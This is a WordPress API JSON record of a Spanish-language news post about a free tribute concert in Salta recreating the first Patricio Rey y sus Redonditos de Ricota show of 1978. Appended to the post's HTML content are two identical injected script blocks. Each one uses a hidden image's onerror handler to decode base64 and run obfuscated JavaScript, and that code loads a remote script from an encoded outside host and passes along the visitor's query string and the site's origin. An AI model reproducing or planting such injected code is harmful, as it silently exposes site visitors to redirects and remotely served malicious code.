{"id":2050,"date":"2023-01-07T19:44:40","date_gmt":"2023-01-07T22:44:40","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2050"},"modified":"2025-08-14T00:26:05","modified_gmt":"2025-08-14T03:26:05","slug":"se-revive-el-historico-recital-de-patricio-rey-en-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2050","title":{"rendered":"Se revive el hist\u00f3rico recital de Patricio Rey en Salta"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#233c32\"><em>En Dean Funes 86, a partir de las 20:30, tendr\u00e1 lugar hoy s\u00e1bado 7 de enero, el recital homenaje al primer recital de Patricio Rey y sus Redonditos de Ricota. Entrada libre y gratuita.<\/em><\/h3>\n\n\n\n<p>Luego de 45 a\u00f1os, la Secretar\u00eda de Cultura propone revivir el hist\u00f3rico recital de Patricio Rey y sus Redonditos de Ricota en el Bar El Polaco. Se trata de una puesta en escena con la participaci\u00f3n de la banda salte\u00f1a El Templo de Momo, que se realizar\u00e1 hoy&nbsp;s\u00e1bado 7 de enero en la Fundaci\u00f3n SalvArte de Leonor Pedroza, Dean Funes 86, a las 20:30 hs, con entrada libre y gratuita hasta agotar aforo.<\/p>\n\n\n\n<p>El Bar El Polaco, propiedad de H\u00e9ctor Aleksandrowicz, alberg\u00f3 las m\u00e1s diversas expresiones de la bohemia y el under entre las d\u00e9cadas del 70 y el 80. El 6 y 7 de enero de 1978, se concreta en ese lugar, los primeros shows de Patricio Rey y sus Redonditos de Ricota, la m\u00edtica banda que se convirti\u00f3 en pieza fundamental de la cultura argentina.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5381-se-revive-el-historico-recital-de-patricio-rey-en-salta.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5381-se-revive-el-historico-recital-de-patricio-rey-en-salta.jpg\" alt=\"Se revive el hist\u00f3rico recital de Patricio Rey en Salta\"\/><\/a><\/figure>\n\n\n\n<p>El Templo de Momo es una banda tributo a Patricio Rey y sus Redonditos de Ricota que se form\u00f3 en 2015. Sus integrantes son Santiago \u00c1lvarez en bater\u00eda, \u00c1lvaro Jim\u00e9nez en bajo, Francisco Rivero en guitarra, Juan Gabriel Olmos en saxo y Andr\u00e9s Figueroa en voz.<\/p>\n\n\n\n<p>La propuesta busca rescatar espacios emblem\u00e1ticos de la ciudad de Salta que fueron protagonistas de hechos que con el tiempo tomaron relevancia.<\/p>\n\n\n\n<p><strong>Memorias<\/strong><\/p>\n\n\n\n<p>En el libro \u201cRecuerdos que mienten un poco\u201d, uno de los mejores vendidos durante el 2019, Carlos \u201cIndio\u201d Solari relat\u00f3 el pasaje del primer recital realizado en la historia de Patricio Rey y los Redonditos de Ricota. El primer recital tuvo lugar en 1978, de acuerdo al artista: \u201cEse fue el verdadero debut de la banda, porque hasta ese momento no hab\u00edamos hecho m\u00e1s que boludear. Y supon\u00eda un bautismo de fuego: era la primera vez que \u00edbamos a tocar delante de un p\u00fablico que no estaba compuesto por amigotes. [\u2026] El bar donde tocamos se llamaba \u2018El Polaco\u2019 y el concierto en s\u00ed mismo fue un desastre. Hab\u00eda m\u00e1s gente arriba del escenario que abajo. Pero de todos modos armamos la clase de quilombo que era nuestra especialidad\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5382-se-revive-el-historico-recital-de-patricio-rey-en-salta.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5382-se-revive-el-historico-recital-de-patricio-rey-en-salta.jpg\" alt=\"Se revive el hist\u00f3rico recital de Patricio Rey en Salta\"\/><\/a><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-revive-el-historico-recital-de-patricio-rey-en-salta-87144\" target=\"_blank\" rel=\"noopener\" title=\"\u00a0Secretar\u00eda de Prensa y Comunicaci\u00f3n\">\u00a0<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/a><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En Dean Funes 86, a partir de las 20:30, tendr\u00e1 lugar hoy s\u00e1bado 7 de enero, el recital homenaje al primer recital de Patricio Rey y sus Redonditos de Ricota. Entrada libre y gratuita. Luego de 45 a\u00f1os, la Secretar\u00eda de Cultura propone revivir el hist\u00f3rico recital de Patricio Rey y sus Redonditos de Ricota [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2051,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26,13],"tags":[],"class_list":{"0":"post-2050","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales","9":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2050"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2050"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2050\/revisions"}],"predecessor-version":[{"id":7216,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2050\/revisions\/7216"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2051"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2050"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2050"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2050"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}